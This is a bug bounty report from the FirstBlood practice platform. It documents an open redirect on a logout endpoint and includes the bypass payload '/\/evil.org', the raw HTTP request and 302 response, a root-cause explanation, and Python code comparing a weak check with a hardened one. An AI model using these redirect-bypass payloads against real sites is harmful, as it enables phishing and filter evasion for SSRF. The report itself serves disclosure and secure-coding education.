FirstBlood-#92 — Open redirect at http://firstbloodhackers.com:49330/drpanel/logout.php
This issue was discovered on FirstBlood v1.0.0
On 2021-05-10, 0xconft reported:
I found an open redirect on your website at the /drpanel/logout.php endpoint on the ref parameter. There's a filter in place where it must start with / and also // is filtered, but I ended up bypassing this with this payload "/\/evil.org", which will be reflected as "//evil.org" in the Location header and thus will redirect the victim to evil.org. An example of the impact caused by this vulnerability is that it can be combined with an SSRF attack to bypass filters, or it can be used for phishing.
GET /drpanel/logout.php?ref=/\/evil.org HTTP/1.1
Host: firstbloodhackers.com:49330
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://firstbloodhackers.com:49330/drpanel/index.php
Cookie: drps=5a5cfb7c6047d6dc8dbc411b2
Upgrade-Insecure-Requests: 1

HTTP/1.1 302 Found
Server: nginx
Date: Mon, 10 May 2021 06:19:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Set-Cookie: drps=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Location: //evil.org
Content-Length: 0
FirstBlood ID: 1
Vulnerability Type: Open Redirect
There is an open URL redirect vulnerability on /logout.php. The code expects the ref value to start with / and does not allow redirects to external domains, but this check can be bypassed.
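The root cause is that the filter checks the raw string for a leading "/" and a "//" prefix, while browsers normalise backslashes to forward slashes when resolving the Location header, so "/\/evil.org" passes the check and is still resolved as a protocol-relative URL. The following is an added illustration of the weak check beside a hardened one; it is written in Python rather than the application's PHP, is not the FirstBlood code, and the function names (weak_is_safe_ref, is_safe_ref, redirect_target) and the fallback path are assumptions for the example.

```python
from urllib.parse import urlsplit

# Fallback used when the supplied ref is rejected (assumed value, not from the app).
DEFAULT_AFTER_LOGOUT = "/drpanel/index.php"


def weak_is_safe_ref(ref: str) -> bool:
    """The check as described in the report: must begin with '/', must not begin with '//'.

    It inspects the raw string only, so '/\\/evil.org' passes even though a browser
    resolves it as '//evil.org'.
    """
    return ref.startswith("/") and not ref.startswith("//")


def is_safe_ref(ref: str) -> bool:
    """Accept only a same-origin, path-only reference.

    Hardening steps:
      1. Reject empty values and ASCII control characters (browsers strip tabs and
         newlines from URLs, which can defeat prefix checks).
      2. Treat '\\' as '/', matching how browsers resolve special-scheme URLs,
         before applying the leading-slash rules.
      3. Parse the normalised value and require that it carries no scheme and no host.
    """
    if not ref or any(ord(c) < 0x20 or ord(c) == 0x7F for c in ref):
        return False

    normalised = ref.replace("\\", "/")
    if not normalised.startswith("/") or normalised.startswith("//"):
        return False

    parts = urlsplit(normalised)
    if parts.scheme or parts.netloc:
        return False
    return True


def redirect_target(ref: str, fallback: str = DEFAULT_AFTER_LOGOUT) -> str:
    """Return the value a logout handler should place in the Location header."""
    return ref if is_safe_ref(ref) else fallback


if __name__ == "__main__":
    # Constructed sample inputs: the reported payload, plain variants, and a normal path.
    for candidate in ["/\\/evil.org", "/\\evil.org", "//evil.org", "/\t/evil.org",
                      "http://evil.org/", "/drpanel/index.php"]:
        print(f"{candidate!r:22} weak={weak_is_safe_ref(candidate)!s:5} "
              f"hardened={is_safe_ref(candidate)!s:5} -> Location: {redirect_target(candidate)}")
```

A simpler and often preferable design is to avoid free-form ref values altogether and map a short allow-listed key to a server-side path; the normalisation above matters only when the parameter must remain a path.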